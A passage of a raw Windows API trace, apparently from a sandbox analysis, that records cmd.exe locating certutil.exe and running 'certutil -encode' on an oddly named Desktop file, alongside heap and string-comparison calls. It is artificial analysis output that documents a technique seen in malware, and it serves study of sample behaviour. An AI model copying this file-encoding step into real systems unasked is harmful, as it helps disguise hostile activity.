_Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0249.556] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0249.556] GetProcessHeap () returned 0x21ed8c70000 [0249.557] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0249.560] GetEnvironmentStringsW () returned 0x21ed8d44660* [0249.560] GetProcessHeap () returned 0x21ed8c70000 [0249.560] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0249.561] FreeEnvironmentStringsA (penv="=") returned 1 [0249.561] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0249.561] GetProcessHeap () returned 0x21ed8c70000 [0249.561] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0249.561] GetEnvironmentStringsW () returned 0x21ed8d44660* [0249.561] GetProcessHeap () returned 0x21ed8c70000 [0249.561] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0249.561] FreeEnvironmentStringsA (penv="=") returned 1 [0249.561] GetProcessHeap () returned 0x21ed8c70000 [0249.561] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95b80) returned 1 [0249.561] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0249.561] ??_V@YAXPEAX@Z () returned 0x1 [0249.561] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3635b510, ftCreationTime.dwHighDateTime=0x1d5e33c, ftLastAccessTime.dwLowDateTime=0x6d3ba1a0, ftLastAccessTime.dwHighDateTime=0x1d5e260, ftLastWriteTime.dwLowDateTime=0x6d3ba1a0, ftLastWriteTime.dwHighDateTime=0x1d5e260, nFileSizeHigh=0x0, nFileSizeLow=0x11c9b, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="rcZz1_vwUIy4k7qcs3.mp3.Sister", cAlternateFileName="")) returned 1 [0249.561] GetProcessHeap () returned 0x21ed8c70000 [0249.561] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45380, Size=0x4bc) returned 0x21ed8d45380 [0249.561] GetProcessHeap () returned 0x21ed8c70000 [0249.561] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45380) returned 0x4bc [0249.561] GetProcessHeap () returned 0x21ed8c70000 [0249.562] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d69f10 [0249.562] GetProcessHeap () returned 0x21ed8c70000 [0249.562] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d69f10, Size=0x58) returned 0x21ed8d69f10 [0249.562] GetProcessHeap () returned 0x21ed8c70000 [0249.562] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d69f10) returned 0x58 [0249.562] GetProcessHeap () returned 0x21ed8c70000 [0249.562] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d69f80 [0249.562] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0249.562] GetProcessHeap () returned 0x21ed8c70000 [0249.562] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4c) returned 0x21ed8c7ce80 [0249.562] ??_V@YAXPEAX@Z () returned 0x1 [0249.562] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0249.562] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7d060 [0249.563] FindClose (in: hFindFile=0x21ed8c7d060 | out: hFindFile=0x21ed8c7d060) returned 1 [0249.563] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cb80 [0249.563] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0249.563] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xbf17bfc9, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xbf17bfc9, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0249.563] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0249.563] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\rcZz1_vwUIy4k7qcs3.mp3.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3635b510, ftCreationTime.dwHighDateTime=0x1d5e33c, ftLastAccessTime.dwLowDateTime=0x6d3ba1a0, ftLastAccessTime.dwHighDateTime=0x1d5e260, ftLastWriteTime.dwLowDateTime=0x6d3ba1a0, ftLastWriteTime.dwHighDateTime=0x1d5e260, nFileSizeHigh=0x0, nFileSizeLow=0x11c9b, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="rcZz1_vwUIy4k7qcs3.mp3.Sister", cAlternateFileName="RCZZ1_~1.SIS")) returned 0x21ed8c7ca60 [0249.564] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0249.564] _wcsnicmp (_String1="RCZZ1_~1.SIS", _String2="rcZz1_vwUIy4k7qcs3.mp3.Sister", _MaxCount=0x1d) returned 8 [0249.564] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0249.564] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0249.564] GetProcessHeap () returned 0x21ed8c70000 [0249.564] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3e) returned 0x21ed8c7c020 [0249.564] ??_V@YAXPEAX@Z () returned 0x1 [0249.564] ??_V@YAXPEAX@Z () returned 0x1 [0249.564] GetProcessHeap () returned 0x21ed8c70000 [0249.564] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d69f80, Size=0x250) returned 0x21ed8d69f80 [0249.564] GetProcessHeap () returned 0x21ed8c70000 [0249.564] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d69f80) returned 0x250 [0249.564] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0249.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0249.565] GetFileType (hFile=0x50) returned 0x2 [0249.565] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0249.565] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0249.565] _get_osfhandle (_FileHandle=1) returned 0x50 [0249.565] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0249.572] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0249.572] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0249.572] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0249.572] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0249.572] _get_osfhandle (_FileHandle=1) returned 0x50 [0249.572] GetFileType (hFile=0x50) returned 0x2 [0249.572] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0249.572] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0249.575] _get_osfhandle (_FileHandle=1) returned 0x50 [0249.575] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0249.576] _get_osfhandle (_FileHandle=1) returned 0x50 [0249.576] GetFileType (hFile=0x50) returned 0x2 [0249.577] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0249.577] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0249.577] _get_osfhandle (_FileHandle=1) returned 0x50 [0249.577] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d69f20*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d69f20*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0249.578] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"rcZz1_vwUIy4k7qcs3.mp3.Sister\" \"rcZz1_vwUIy4k7qcs3.mp3.Cruel\" ") returned 72 [0249.578] _get_osfhandle (_FileHandle=1) returned 0x50 [0249.578] GetFileType (hFile=0x50) returned 0x2 [0249.578] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0249.578] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0249.578] _get_osfhandle (_FileHandle=1) returned 0x50 [0249.578] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x48, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x48) returned 1 [0249.579] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0249.579] _get_osfhandle (_FileHandle=1) returned 0x50 [0249.579] GetFileType (hFile=0x50) returned 0x2 [0249.579] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0249.579] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0249.579] _get_osfhandle (_FileHandle=1) returned 0x50 [0249.579] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0249.584] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0249.586] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0249.587] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0249.587] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0249.587] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0249.587] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0249.587] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0249.587] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0249.587] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0249.587] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0249.587] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0249.587] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0249.587] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0249.587] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0249.587] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0249.587] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0249.587] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0249.587] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0249.587] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0249.587] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0249.587] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0249.587] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0249.588] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0249.588] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0249.588] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0249.588] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0249.588] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0249.588] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0249.588] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0249.588] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0249.588] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0249.588] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0249.588] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0249.588] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0249.588] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0249.588] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0249.588] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0249.588] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0249.588] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0249.588] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0249.588] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0249.588] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0249.588] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0249.588] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0249.588] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0249.588] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0249.588] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0249.588] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0249.589] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0249.589] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0249.589] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0249.589] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0249.589] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0249.589] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0249.589] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0249.589] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0249.589] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0249.589] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0249.589] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0249.589] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0249.589] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0249.589] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0249.589] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0249.589] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0249.589] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0249.589] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0249.589] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0249.590] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0249.590] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0249.590] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0249.590] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0249.590] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0249.590] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0249.590] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0249.590] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0249.590] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0249.590] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0249.590] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0249.590] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0249.590] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0249.590] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0249.590] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0249.590] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0249.590] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0249.590] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0249.590] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0249.590] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0249.590] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0249.590] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0249.590] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0249.590] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0249.590] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0249.591] ??_V@YAXPEAX@Z () returned 0x1 [0249.591] GetProcessHeap () returned 0x21ed8c70000 [0249.591] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93314b0 [0249.591] GetProcessHeap () returned 0x21ed8c70000 [0249.591] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb2) returned 0x21ed8c964c0 [0249.591] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0249.591] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0249.591] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0249.591] GetProcessHeap () returned 0x21ed8c70000 [0249.591] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed93414a0 [0249.592] SetErrorMode (uMode=0x0) returned 0x0 [0249.592] SetErrorMode (uMode=0x1) returned 0x0 [0249.593] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed93414b0, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0249.593] SetErrorMode (uMode=0x0) returned 0x1 [0249.593] GetProcessHeap () returned 0x21ed8c70000 [0249.593] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93414a0, Size=0x52) returned 0x21ed93414a0 [0249.593] GetProcessHeap () returned 0x21ed8c70000 [0249.593] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93414a0) returned 0x52 [0249.593] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0249.593] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0249.593] GetProcessHeap () returned 0x21ed8c70000 [0249.593] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed8d5fd80 [0249.593] GetProcessHeap () returned 0x21ed8c70000 [0249.593] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed99805f0 [0249.593] GetProcessHeap () returned 0x21ed8c70000 [0249.593] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed99805f0, Size=0x1be) returned 0x21ed99805f0 [0249.593] GetProcessHeap () returned 0x21ed8c70000 [0249.593] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed99805f0) returned 0x1be [0249.593] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0249.593] GetProcessHeap () returned 0x21ed8c70000 [0249.593] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8d45850 [0249.594] GetProcessHeap () returned 0x21ed8c70000 [0249.594] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45850, Size=0x7e) returned 0x21ed8d45850 [0249.594] GetProcessHeap () returned 0x21ed8c70000 [0249.594] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45850) returned 0x7e [0249.594] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0249.594] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0249.595] GetLastError () returned 0x2 [0249.595] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0249.595] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0249.595] GetLastError () returned 0x2 [0249.595] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0249.595] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7d0c0 [0249.596] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0249.596] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0249.596] GetLastError () returned 0x2 [0249.596] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cdc0 [0249.596] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0249.596] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0249.596] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0249.596] ??_V@YAXPEAX@Z () returned 0x1 [0249.596] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0249.597] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0249.597] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0249.597] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0249.597] GetProcessHeap () returned 0x21ed8c70000 [0249.597] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45d10 [0249.598] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0249.598] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0249.598] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0249.598] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0249.598] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0249.598] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0249.598] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0249.598] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0249.598] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0249.598] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0249.598] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0249.598] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0249.598] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0249.598] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0249.598] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0249.598] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0249.598] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0249.598] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0249.598] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0249.598] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0249.598] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0249.598] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0249.598] 